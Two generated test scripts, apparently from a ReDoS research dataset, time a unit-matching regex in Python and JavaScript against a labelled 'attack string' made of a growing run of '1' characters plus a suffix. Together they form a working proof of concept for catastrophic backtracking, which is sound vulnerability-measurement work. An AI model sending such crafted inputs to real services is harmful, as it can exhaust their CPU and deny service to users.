File: regexlib/2021-5-15/python_re_test_file/regexlib_2891.py
# 2891
# (\d*\.?\d+)\s?(px|em|ex|%|in|cn|mm|pt|pc+)
# EXPONENT
# nums:4
# EXPONENT AttackString:""+"1"*512+"◎@! _1!_1SLQ_1"

import re
from time import perf_counter

regex = """(\d*\.?\d+)\s?(px|em|ex|%|in|cn|mm|pt|pc+)"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "" + "1" * i * 1 + "◎@! _1!_1SLQ_1"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!")

File: regexlib/2021-5-15/javascript_test_file/regexlib_2891.js
/* 2891
 * (\d*\.?\d+)\s?(px|em|ex|%|in|cn|mm|pt|pc+)
 * EXPONENT
 * nums:3
 * EXPONENT AttackString:""+"1"*512+"◎@! _1!_1SLQ_1"
 */
var REGEX = /(\d*\.?\d+)\s?(px|em|ex|%|in|cn|mm|pt|pc+)/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '' + '1'.repeat(i*1) + '◎@! _1!_1SLQ_1'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 1 + ": " + time_cost+" ms")
}